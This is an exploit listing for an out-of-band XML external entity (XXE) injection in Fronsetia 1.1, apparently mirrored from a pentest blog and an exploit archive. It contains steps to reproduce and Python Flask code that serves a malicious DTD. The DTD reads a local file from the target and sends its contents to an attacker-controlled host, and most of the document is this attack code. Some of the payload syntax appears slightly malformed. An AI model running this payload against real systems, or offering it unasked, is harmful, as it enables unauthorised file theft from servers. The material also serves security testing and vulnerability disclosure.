Share
## https://sploitus.com/exploit?id=PACKETSTORM:182763
# Exploit Title: XXE OOB - fronsetiav1.1  
# Date: 11/2024  
# Exploit Author: Andrey Stoykov  
# Version: 1.1  
# Tested on: Debian 12  
# Blog:  
https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-15-oob-xxe.html  
  
XXE OOB  
  
Description:  
  
- It was found that the application was vulnerable XXE (XML External Entity  
Injection)  
  
Steps to Reproduce:  
  
1. Add Python3 server to serve malicious XXE payload  
2. Add a file on the file system to be read via the application XXE payload  
echo 123123 > /tmp/123  
3. Enter the following URL as input  
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl  
  
// Python Server Code  
  
from flask import Flask, Response, request  
import logging  
  
app = Flask(__name__)  
  
# Set up logging  
logging.basicConfig(level=logging.DEBUG)  
  
@app.route('/testxxeService', defaults={'path': ''})  
def catch_all(path):  
app.logger.debug("Serving XXE payload")  
xml = """<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE data [  
<!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;  
]>  
<data>&send;</data>"""  
return Response(xml, mimetype='text/xml', status=200)  
  
@app.route('/data.dtd', defaults={'path': ''})  
def hello(path):  
app.logger.debug("DTD requested")  
xml = """<!ENTITY % file SYSTEM "file:///tmp/123">  
<!ENTITY % eval "<!ENTITY % exfil SYSTEM '  
http://192.168.78.1:8000/?content=%file;'>">  
%eval;  
%exfil;"""  
return Response(xml, mimetype='text/xml', status=200)  
  
if __name__ == "__main__":  
app.run(host='0.0.0.0', port=10000)